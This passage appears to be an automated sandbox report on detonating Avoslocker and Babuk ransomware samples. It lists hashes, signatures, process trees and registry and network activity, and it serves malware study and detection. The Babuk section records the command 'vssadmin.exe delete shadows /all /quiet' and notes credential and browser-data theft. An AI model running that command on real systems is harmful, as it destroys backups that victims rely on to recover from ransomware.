SHA512	c42e3843f028c0957f3fa1cf4bdd78bafdaa4d1c641105fa682e71e9d6057390eee7e9ba60abf30185ef90bd08c063c9121def3009f9f256ed3c52dc47e0a02b

C:\Users\Admin\Documents\RestoreStop.xlsx

MD5	6fe8d49e579c32a03bcc6535b065eeb1
SHA1	eb38735106c74009f1d1eae03e2be409b4cba856
SHA256	59cfbc2fb8d62a8e5f5fe926d47919c5e0d749618511d3daa69fd0d404179b38
SHA512	6d4271ea83cf79d212216b6e6877fae626fdc0cf26a5efd2166a83547deedc87bde904063a361ab411ff835fe226641003a24c99d1311721ee92c6b599e5a6e5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5	8affc3a4e2241ed9617474f7b8b4742c
SHA1	775657cdae4f5bb0102426e170e30d97265120ec
SHA256	cc065beb3c39c6603280c5b20605e241ccbf02dd173fd9dc45fdc8d27c4bba03
SHA512	0976ecd1aea92211218b11a2bdafd428d2069d9ee13fd48d3756148c9b69e8bac77c227930d917afaf35d2d65aba9556551bdc2cb4dd8360a415012e0629b81a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5	49e4de2872781beb89a71b97cfb89b0a
SHA1	23fb6eda0b03944a66b9a434b4c21a734b69f48a
SHA256	080e5ede20dbe394700b81e4378034563cb005dd46ceba28be7df11a7e14d6d8
SHA512	15dbcd3de617fae3e0cdf2961eb3f772a348cd80ad24257609922822f544e98f4d15dae5f6a337ba87d45cbfa1456547b99e95a46e560d185b050b4e8f2d99e9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5	aad614f4d23aca9d0ef32d672dda01b0
SHA1	c8463432e583cf62fa4f511b486395b7a3ac8fc1
SHA256	2b93e4bf6411d5e13d5b940b4f3c16c540b044f1d1380be501d0a3431c847222
SHA512	d7723d9437a88a0279f01c91229c3f33353a62cca66005e1a7e4e6eb7181459a9e8e9731b160fcc4054d28f0d2e73089bacb85f65b7826fb6b725a42770cbfe9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5	b7675668d8cc7cb961ad097eab8c054d
SHA1	66936d5eac55700c483c849a885e11d4925bd175
SHA256	03a7d50b09c391373f86d3698b0b73b1d12c7056a9de385f12e0c83370b40408
SHA512	cb40b17e8720e9ab38a3d8e6868bcba67608e6c98cc9ea6bd1c47f7b4a4944775d2d97c3324870102a23d8f39070d1b27c00f4b6d9302bce0169ee7b867c9353

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5	be1654c1d1e2fcaacb4a8978dc48cc41
SHA1	dfe7dafd455489b47955864c1284220427800eca
SHA256	c57c11f95a9b7b316624c116767657b3ccb0fb6ea99abc3acdccfa852c111be0
SHA512	d5a3265509f4f8fb4d5e7e7e616ec946af34c97e8968ab732f07b73a96c9cf03c1bae6fd7095beda760c8963021804116cf20cd9571f482bd2572db6e7c5660a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5	002686ec7528467a531b0f301925dd83
SHA1	885085cd91a552c0cda429ce9105e7ded7c69e52
SHA256	9b7e60e3c4f380d27593b02a2462244bf1b8d8450e8584d1ded9f2c95085c7c1
SHA512	e4bb3bae9d192e8517a305c3bf1c0143347452767db3e5d2f6f2f0742ba89c0e3e9b1fb59d718a2554ae0b9f05d182adbf037e30b12875ce02f136260c024924

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5	c85db28461602e72858c1a04fc8eedc4
SHA1	1539b3c710117c339c97b75b0fd3f29fc14e15ac
SHA256	c580f5e9bfc3974ce19b217773b57bf6eefe3ef6cffec5a45d7ebd160ce3091d
SHA512	106cb799fef4bee2a2f02ec887a9350141150af961d9173f4ad52db4730152ecabdd353fedb21d64943199c197f77d95a0016c236160516820ecc5684e4a6533

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5	d5e5003600d54e751c6c390465e36f64
SHA1	92cda901a0491a58b700d5b8ea8b2df0dec32e5a
SHA256	819313fc1bba79774fb586cfc70bba59e4f4e3865eb552b2c08054a6edba2a21
SHA512	1a4aee1fc865b113cf5e32986bd6367a870909b6c89a9fb88ac2d1dbc697c9f4ed56d289f01e730fcbe68f42ccae4341d21c4b114c5a169517f35d2c0aed18d4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5	ac44cf6b385e1e9aa8e083b369f576f8
SHA1	5f0648b952ad5595ef34c3fc2c88ac5e446ece25
SHA256	912b6bcfe1f40adeb982f7e3601ad711404b5aff68db17104d4dd70bf1628fd4
SHA512	c081019b0617212bc8204ebd17cade5958d638f546016a289b4b3cb48b3b220ee8675d7f74091cf119e07c206cd8b20b9403f317ff4a638eb19176c9e7cca966

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240704-en

Max time kernel

148s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Renames multiple (60) files with added filename extension

ransomware

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	133.211.185.52.in-addr.arpa	udp
US	8.8.8.8:53	240.143.123.92.in-addr.arpa	udp
US	8.8.8.8:53	71.159.190.20.in-addr.arpa	udp
US	8.8.8.8:53	28.118.140.52.in-addr.arpa	udp
US	8.8.8.8:53	217.106.137.52.in-addr.arpa	udp
US	8.8.8.8:53	50.23.12.20.in-addr.arpa	udp
US	8.8.8.8:53	56.126.166.20.in-addr.arpa	udp
US	8.8.8.8:53	55.36.223.20.in-addr.arpa	udp
US	8.8.8.8:53	tse1.mm.bing.net	udp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp

Files

C:\Users\GET_YOUR_FILES_BACK.txt

MD5	0237b63f764204e00d7242cc4d908271
SHA1	9d88e59463e2a963bea95d6a2cc5383e922f2f27
SHA256	7bee0aff7241590f5bd35727a1a544a492b7533f1acba685611dd269078d1857
SHA512	0daec31046c2704b30760f7aecc944f9591cdf22511e5e9276f3dbc376cc60b04853c3e25abca2e754aeaaaac49c264c7d89d418c832c8275fb5484d51a99b3e

Analysis: behavioral6

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240709-en

Max time kernel

108s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (1641) files with added filename extension

ransomware

Checks computer location settings

Description	Indicator	Process	Target
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description	Indicator	Process	Target
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\How To Restore Your Files.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates connected drives

Description	Indicator	Process	Target
File opened (read-only)	\??\H:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\J:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\Z:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\N:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\O:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\S:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\G:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\L:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\V:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\M:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\R:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\T:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\P:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\A:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\X:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\Y:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\U:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\I:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\K:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\B:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\Q:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\W:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\E:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A

Interacts with shadow copies

ransomware

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\vssadmin.exe	N/A
N/A	N/A	C:\Windows\system32\vssadmin.exe	N/A

Modifies registry class

Description	Indicator	Process	Target
Key created	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000_Classes\Local Settings\MuiCache	C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A

Suspicious use of SetWindowsHookEx

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 4092 wrote to memory of 4152	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	C:\Windows\System32\cmd.exe
PID 4092 wrote to memory of 4152	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	C:\Windows\System32\cmd.exe
PID 4152 wrote to memory of 4604	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 4152 wrote to memory of 4604	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 4092 wrote to memory of 3436	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	C:\Windows\System32\cmd.exe
PID 4092 wrote to memory of 3436	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	C:\Windows\System32\cmd.exe
PID 3436 wrote to memory of 2380	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 3436 wrote to memory of 2380	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

